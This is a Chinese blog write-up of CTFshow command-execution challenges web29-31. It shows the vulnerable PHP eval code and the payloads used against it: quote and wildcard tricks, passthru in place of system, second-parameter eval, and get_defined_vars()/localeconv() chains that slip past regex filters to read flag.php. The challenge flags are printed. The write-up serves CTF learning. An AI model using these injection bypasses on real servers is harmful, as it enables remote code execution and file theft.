CTFshow 命令执行 web29 30 31

已于 2022-11-08 10:27:42 修改
阅读量1.4k 收藏 8
点赞数 3
分类专栏: 渗透测试 CTF 命令执行 文章标签: web安全 网络安全
于 2022-11-08 10:24:25 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_40345591/article/details/127744117
版权
渗透测试 同时被 3 个专栏收录
49 篇文章 4 订阅
订阅专栏
CTF
16 篇文章 0 订阅
订阅专栏
命令执行
10 篇文章 2 订阅
订阅专栏

目录

web29

代码分析:

payload:

解题过程:

flag:

web30

代码分析:

payload:

​编辑flag:

web31

代码分析:

二次传递:通过传两个参数来绕过检测

payload:

套娃:套娃这里介绍两种套娃的方式get_defined_vars()、localeconv()

需要用到的函数:

第一种

第二种

flag:

web29

代码分析:

error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag/i", $c)){
        eval($c);
    }
    
}else{
    highlight_file(__FILE__);
}

 GET方式获取参数c,并将eval($c)将c作为代码执行

preg_match正则匹配,这里是判断是否存在flag存在则不执行,即过滤flag

payload:

?c=system('tac fl""ag.php);

绕过flag.php的方法很多,这里使用最简单的绕过方式双引号绕过,和它等同的是单引号绕过,更多的绕过方式后面也会提到

tac是查看代码的命令,与cat类似,不知道为什么cat在这里用不了

解题过程:

?c=system('ls');

查看一下当前目录有什么文件

再使用payload获取flag

flag:

ctfshow{144242cf-a65b-4239-99e4-15e538453d2f}

web30

代码分析:

if(!preg_match("/flag|system|php/i", $c))

这里把system与flag、php都过滤了

system绕过:可以使用passthru等函数绕过

flag.php:可以使用引号绕过fl""ag.p""hp,也可以使用通配符绕过fl*

payload:

?c=passthru('ls');
?c=passthru('tac fl*');

flag:

ctfshow{8ea88388-bcad-4091-9c35-cf3cc290f5f6} 

web31

代码分析:

 if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'/i", $c))

过滤的东西有点多,单引号过滤了,空格过滤了,这时候可以考虑用二次传递或者套娃来做

二次传递:通过传两个参数来绕过检测

payload:

?c=eval($_GET[1]);&1=system('ls');
?c=eval($_GET[1]);&1=system('tac flag.php');

if中检测的是eval($_GET[1]);并没有出现违法字符,但我们通过eval与&1将命令传递进c中并且能被执行

套娃:套娃这里介绍两种套娃的方式get_defined_vars()、localeconv()

需要用到的函数:

get_defined_vars() 返回一个包含所有已定义变量列表的多维数组,这些变量包括环境变量、服务器变量和用户定义的变量。

array_pop() 是删除并返回数组最后一个元素

current() 返回数组中的当前元素的值。别名是 pos()

next() 返回数组中的下一个元素的值。

end()最后一个

scandir() 函数返回指定目录中的文件和目录的数组。

print_r() 函数用于打印变量,以更容易理解的形式展示。

localeconv()函数会返回一一个包含本地数字及货币格式信息的数组,该数组的第一个元素就是"."

current() 函数返回数组中的当前元素的值。别名是 pos()

array_reverse() 函数将原数组中的元素顺序翻转,创建新的数组并返回。

read_file()、highlight_file()和show_source()读出源码

第一种

print_r():函数用于打印变量,以更容易理解的形式展示

get_defined_vars():返回一个包含所有已定义变量列表的多维数组,这些变量包括环境变量、服务器变量和用户定义的变量。

 print_r(get_defined_vars());

 可以看到一共有这么多参数,其中有个值未POST,尝试使用POST传入Chen=system('ls');

 可以看到POST中出现先了一个system('ls'),现在就需要通过函数将它取出来

current() :返回数组中的当前元素的值。别名是 pos()
next() :返回数组中的下一个元素的值。

使用next函数给它取出来

 print_r(next(get_defined_vars()));

 

 取出来了一个类似于数组的东西,下标为Chen 值为system('ls');

array_pop() 是删除并返回数组最后一个元素
使用array_pop()将值取出来

 print_r(array_pop(next(get_defined_vars())));

现在传入进入的内容就相当于 print_r(system('ls')) ,只需要将print_r换成eval,最终payload

POST传递Chen=system('ls');

eval(array_pop(next(get_defined_vars())));

改变Chen=systme('tac flag.php');

第二种

scandir() 函数返回指定目录中的文件和目录的数组。

localeconv()函数会返回一一个包含本地数字及货币格式信息的数组,该数组的第一个元素就是"."

这道题将.给过滤了,所以可以使用localeconv()代替点,scandir(.),使用前面提到的current()/pos()将.给取出来

print_r(scandir(pos(localeconv())));

可以看到flag.php ,使用函数给它取出来使用代码展示函数,将网页显示出来

array_reverse():将整个数组反转,再使用next取出flag.php

print_r(next(array_reverse(scandir(pos(localeconv())))));

最后使用 read_file()、highlight_file()和show_source()读出源码

highlight_file(next(array_reverse(scandir(pos(localeconv())))));

flag:

ctfshow{44e0aa35-ceb8-4317-b8ed-c3f7ef77a40c}

白帽Chen_D
关注
  • 3
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
ctfshow web139命令盲注脚本
10-21
ctfshow靶场 web入门 web139 命令盲注脚本
CTFSHOW web183 正则爆破脚本
10-21
CTFSHOW web183 正则爆破脚本
CTFshow 命令执行 web29-web40
m0_73121489的博客
06-25 264
过滤了反引号、左括号和分号,passthru、printf和echo都用不了,取反绕过也不行,多过滤了php和file,PHP伪协议用不了,只能用data协议。BP抓包,用HackBar传参之后没有内容回显。这题解法也差不多,数字换成字母就可以了。过滤了system,php,flag。涉及到一点文件包含,只过滤了flag。然后在源码里就可以看到flag。base64解码即得flag。法一:php://input。很简单,就过滤了flag。新姿势:嵌套文件包含。和web32一个解法。和web32一个解法。
CTFshow web命令执行29-36)
csjjjd的博客
02-07 1338
磨刀不误砍柴工,看了我之前的文章后,车速自然要加快,10分钟八道题转瞬即逝,苦于篇幅太长,剩下内容在下一篇文章。因为CTFshow后面flag不输出来的基本都藏在flag.php所以之后没有必要直接system(ls);当然你要用我文章其他命令也可以,都是降维打击的,是不是很爽!第二个命令就搞定了,接下来直接base64解码就好!,那直接第二条就搞定了。
ctfshow misc31题解
最新发布
2302_79259268的博客
07-10 154
再看那个mp3文件是歌曲《关键词》,搜索得到有关键词加密,但是现在信息不够,pdf里应该还有东西没找到,然后用wbstego再解密pdf得到ENTYNSTLWNRNTKYW13287484,这个应该就是密文,解出来是。之后我用MP3Stego试了一下,密码用得xiaomotuo,毕竟专门用拼音来做名字,可以试一下,不过没有得到什么,还试了藏物于音,不过也没东西。输入后打开发现里面是文本加密成花朵,找个网站解开,得到qwertyuiop,不过不是wav文件密码。这样就获得了那个wav文件。
CTFshow_web入门_命令执行_web29~54
ScyLamb的博客
02-07 1671
0x00 web29 if(!preg_match("/flag/i", $c)){ 只过滤flag【不区分大小写】 ?c=system('ls'); ?c=system('cat `ls`'); 预期解:echo `nl fl''ag.php`; 0x01 web30 if(!preg_match("/flag|system|php/i", $c)){ 过滤了文件名、一个系统命令执行函数、php【不区分大小写】 ?c=passthru('ls'); ?c=passthru("nl fl''ag.
ctfshow web入门 命令执行web29-web57详解
m0_75155186的博客
03-25 819
在liunx中,$(())为0 , $((~$(())))为-1 ~$代表取反,0取反后为-1,这样就可以先构造出-37,取反后就为36,也就是$(())中有37个$((~$(())))在加上取反,也就是$((~$(( ))))中有37个-1。题目没有过滤 . 可以从上传post请求来入手,构造一个post请求,会上传到服务器/tmp的临时目录下,通过上传的文本中写入Linux的shell格式,用 . 来执行这个临时文件。点了提交后会在/tmp/下生成一个临时文件,文件的名称是固定php?
ctfshow---命令执行
fainpo的博客
03-20 1356
就是让标准输出重定向到/dev/null中(丢弃标准输出),然后错误输出由于重用了标准输出的描述符,所以错误输出也被定向到了/dev/null中,错误输出同样也被丢弃了。data://text/plain, 这样就相当于执行了php语句 .php 因为前面的php语句已经闭合了,所以后面的.php会被当成html页面直接显示在页面上,起不到什么作用。$((~$(( $((~$(())))+$((~$(())))+$((~$(()))) )))) 这个是2。
ctfshow web214 时间盲注标准脚本
10-21
ctfshow web214 时间盲注标准脚本
CTFSHOW web193 left标注盲注脚本
05-04
这段代码是一个用于获取某个网站的 flag 的脚本。它使用了 SQL 注入漏洞来获取 flag。具体来说,它通过构造 SQL 语句的方式,逐个字符地获取 flag。其中,它通过修改注入语句中的 payload 变量,来获取不同的信息,...
ctfshow web184 正则爆破脚本0x16进制
10-21
ctfshow web184 正则爆破脚本0x16进制
新BugKu-web篇-web29
jiuyongpinyin的博客
06-01 172
web29 这道题考察的是sha1()函数的漏洞,也就是可以把参数变成数组绕过,我们先分析代码 <?php highlight_file('flag.php'); $_GET['id'] = urldecode($_GET['id']); // 使用get方式传入id并且会url编码 $flag = 'flag{xxxxxxxxxxxxxxxxxx}'; if (isset($_GET['uname']) and isset($_POST['passwd'])) { // 使用get方式传入uname
CTFshow web入门之命令执行web29-web77)
小白的博客
05-10 1444
2、然后上传一个new2.php文件并抓包,多试几次,因为不一定生成的临时文件的最后一个字母是大写,文件内容如下。1、先构造一个文件上传的html页面,代码如下(test-fileupdown.html)3、在上传文件的过程中,抓包,之后添加参数c=.%20/?4、所以传入这个参数的意思就是匹配上传command.php所生成的临时文件,并执行。接着直接用cat flag.php查看一下flag.php文件就好了。略(与web41相同)
ctfshow命令执行web30-39
m0_62584974的博客
04-05 1538
ctf的命令执行
ctfshow web入门 命令执行 web29~web77 web118~web124
qq_62989306的博客
09-13 2085
eval函数实现RCE、文件包含通过data协议实现RCE、eval函数无数字字母实现RCE、system函数绕过>/dev/null 2>&1实现RCE、system函数各种骚操作实现RCE。无参数RCE、无数字字母RCE、绕过open_basedir、PDO连接数据库load_fiel读取文件、利用FFI调用C库的system函数、环境变量……
2018领航杯awd简单复现
plant1234的博客
12-19 3668
首先这里需要搭建一个cms的平台得到: 利用D盾进行漏洞扫描得到: 5级的eval后门漏洞 可以看到这里有一个5级的eval后门漏洞,我们查看文件得到源码: 这是一句话后门,我们利用一下这个后门得到: 这里能cat flag 修补增加过滤或者删除漏洞 2级的fwrite审计: 利用seay工具进行代码审计: 源码: 可以发现这是一个日志记录,但是它把记录的日志都写入到了 /var/www/html/log.php文件,这就造成文件写入漏洞 我们利用这个log1.php用get的方式写一个<?
CTFSHOW php命令执行
m0_64180167的博客
08-11 796
这里能发现是匹配flag 但是存在高亮 高亮有需要路径同时存在eval 命令执行所以我们传入命令但是过滤了flag我们看看怎么绕过发现了 flag我们绕过正则匹配flag字符串。
CTFshow命令执行29-123
qq_43534481的博客
08-06 1454
CTFshow命令执行WP
ctfshow-命令执行(web118-web122)
m0_72125469的博客
02-08 898
一部分命令失败会返回1,也有一些命令返回其他值,表示不同类型的错误,比如Command not found返回127。code,并不是,
ctfshow web入门命令执行
09-05
在CTF中,web入门命令执行指的是通过Web应用程序的漏洞,将恶意的命令注入到应用程序中并执行。这样的攻击可以导致未经授权的访问和操纵应用程序的数据和功能。 根据引用中提供的信息,可以看到一些常见的双写绕过...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

白帽Chen_D

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值